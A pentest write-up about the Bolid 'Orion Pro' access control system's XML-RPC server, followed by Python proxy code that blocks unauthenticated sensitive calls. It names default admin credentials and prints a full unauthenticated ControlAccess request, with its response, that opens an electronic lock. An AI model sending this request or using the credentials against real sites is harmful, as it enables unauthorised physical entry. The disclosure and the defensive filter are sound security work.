Once, during a pentest, I discovered a lot of open ports (XML-RPC) on one of the hosts on the Wi-Fi network.

The server kindly answered the garbage I had sent:

BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10

A bit of googling, and I found out that this is the access control system АРМ «Орион Про» by the security company ЗАО НВП «Болид».

After reading the documentation I tried ADMINISTRATOR:ORION on the XML-RPC interface. Success. You can manage the system and the database. But this story is not about that.

What if there was a strong password?

In such an unimaginable case you could use the XML-RPC methods that do not require authentication, for example GetPasswordListWithStatus, GetKeyFullInformation, GetDeviceListAsync, ControlAccess, etc.

If you want, you can open the door with this request:

GET / HTTP/1.1
Host: x.x.x.x:8080
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,ru-RU;q=0.9,en;q=0.8,en-US;q=0.7
Connection: close
Content-Type: application/xml
Content-Length: 1467

<?xml version="1.0" encoding="windows-1251"?>
<methodCall>
  <methodName>ControlAccess</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>ComPort</name>
            <value>
              <int>3</int>
            </value>
          </member>
          <member>
            <name>PKUAddress</name>
            <value>
              <int>0</int>
            </value>
          </member>
          <member>
            <name>DeviceAddress</name>
            <value>
              <int>5</int>
            </value>
          </member>
          <member>
            <name>AggregateAddress</name>
            <value>
              <int>1</int>
            </value>
          </member>
          <member>
            <name>Command</name>
            <value>
              <int>7</int>
            </value>
          </member>
          <member>
            <name>MethodNameForAnswer</name>
            <value>
              <string>Result</string>
            </value>
          </member>
          <member>
            <name>IPSERVER</name>
            <value>
              <string>y.y.y.y</string>
            </value>
          </member>
          <member>
            <name>PORTSERVER</name>
            <value>
              <int>7777</int>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Voilà! The electronic lock is open!

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 298
Content-Type: text/xml
Content-MD5: 5si9s8913Zio3EUFMy7mww==
Server: BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10

<?xml version="1.0" encoding="Windows-1251" ?>
<methodResponse>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>Result</name>
            <value><boolean>1</boolean></value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodResponse>

The company believes that authentication is not required in access control software. Why do we need such security products?
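Since the server itself checks nothing, the only practical control is in front of it: a reverse proxy or an IDS that parses the XML-RPC body and refuses (or at least alerts on) the methods listed above whenever the call arrives without an authenticated session. The Python below is an example added here, not code from this post or from Bolid. It assumes the proxy supplies an `authenticated` flag for the session, takes SENSITIVE_METHODS from the list named above, and uses constructed copies of the request and response shown in the post as sample input.

```python
import xml.etree.ElementTree as ET

# Methods the post reports as callable without credentials.
SENSITIVE_METHODS = frozenset({
    "GetPasswordListWithStatus",
    "GetKeyFullInformation",
    "GetDeviceListAsync",
    "ControlAccess",
})


def parse_method_call(body):
    """Return (method_name, params) for an XML-RPC <methodCall> body.

    `body` is the raw bytes of the HTTP body; the encoding named in the XML
    declaration (windows-1251 for this server) is honoured by the parser.
    Only the single struct-of-scalars parameter shape used by the request
    above is decoded: <int>/<i4> become int, everything else stays a string.
    """
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall (root is <%s>)" % root.tag)
    method = (root.findtext("methodName") or "").strip()
    if not method:
        raise ValueError("methodCall without a methodName")
    params = {}
    for struct in root.iterfind("params/param/value/struct"):
        for member in struct.iterfind("member"):
            key = member.findtext("name")
            scalar = member.find("value/*")
            if not key or scalar is None:
                continue
            text = (scalar.text or "").strip()
            params[key] = int(text) if scalar.tag in ("int", "i4") else text
    return method, params


def gate(body, authenticated):
    """Policy check for one request: returns (verdict, reason).

    'reject' = malformed or not a methodCall, 'deny' = sensitive method
    called without an authenticated session, 'allow' = pass to the server.
    The `authenticated` flag is assumed to come from the proxy's own session
    handling (hypothetical; the Orion server has no such notion).
    """
    try:
        method, params = parse_method_call(body)
    except (ET.ParseError, ValueError) as exc:
        return "reject", "unparseable request: %s" % exc
    if method in SENSITIVE_METHODS and not authenticated:
        detail = ""
        if method == "ControlAccess":
            # Record which device and command were requested so the alert is actionable.
            detail = " (ComPort=%s DeviceAddress=%s Command=%s)" % (
                params.get("ComPort"), params.get("DeviceAddress"), params.get("Command"))
        return "deny", "unauthenticated call to %s%s" % (method, detail)
    return "allow", "%s by %s session" % (method, "authenticated" if authenticated else "anonymous")


# Constructed sample, modelled on the ControlAccess request shown in the post.
SAMPLE_CONTROL_ACCESS = b"""<?xml version="1.0" encoding="windows-1251"?>
<methodCall>
  <methodName>ControlAccess</methodName>
  <params><param><value><struct>
    <member><name>ComPort</name><value><int>3</int></value></member>
    <member><name>PKUAddress</name><value><int>0</int></value></member>
    <member><name>DeviceAddress</name><value><int>5</int></value></member>
    <member><name>AggregateAddress</name><value><int>1</int></value></member>
    <member><name>Command</name><value><int>7</int></value></member>
    <member><name>MethodNameForAnswer</name><value><string>Result</string></value></member>
    <member><name>IPSERVER</name><value><string>y.y.y.y</string></value></member>
    <member><name>PORTSERVER</name><value><int>7777</int></value></member>
  </struct></value></param></params>
</methodCall>"""

# Constructed copy of the server's reply: a methodResponse is not a call and is rejected.
SAMPLE_RESPONSE = b"""<?xml version="1.0" encoding="Windows-1251" ?>
<methodResponse><params><param><value><struct>
<member><name>Result</name><value><boolean>1</boolean></value></member>
</struct></value></param></params></methodResponse>"""


if __name__ == "__main__":
    for label, body, authed in [
        ("anonymous ControlAccess", SAMPLE_CONTROL_ACCESS, False),
        ("authenticated ControlAccess", SAMPLE_CONTROL_ACCESS, True),
        ("methodResponse sent as a request", SAMPLE_RESPONSE, False),
        ("garbage", b"BolidXMLRPC?", False),
    ]:
        print("%-36s -> %s: %s" % (label, *gate(body, authed)))
```

The parser is deliberately strict: anything that is not a well-formed methodCall is rejected rather than forwarded, so a malformed body cannot slip past the method check. The deny reason carries the device and command fields, which is what an analyst needs in the alert; a real deployment would also log the client address and rate of such calls.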